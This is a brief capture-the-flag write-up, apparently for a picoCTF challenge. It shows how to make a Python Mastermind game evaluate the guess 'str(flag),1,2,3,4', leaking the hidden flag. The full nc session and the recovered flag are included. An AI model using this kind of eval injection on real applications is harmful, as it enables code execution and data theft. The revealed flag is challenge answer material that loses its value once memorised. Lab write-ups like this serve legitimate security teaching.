We know there is a variable called flag, so we force it to print out the flag with str(flag). However, the input needs to be a tuple of length 5, so we just use str(flag),1,2,3,4 as our guess:

$ nc python.picoctf.com 6362
Master Mind Game
I've set my code. Guess it!
Rules: You should input your guesses as 5 digits separated by commas.
       I will respond by marking the correct digits with a 2, marking
       digits in the wrong place with a 1, and marking wrong digits 0.
guess> str(flag),1,2,3,4
 --------------------- 
 | i_are_a_pyeval_mastermind | 1 | 2 | 3 | 4 | 
 --------------------- 
 --------------------- 
 | 0 | 1 | 0 | 2 | 0 | 
 --------------------- 
guess> 

Key: i_are_a_pyeval_mastermind
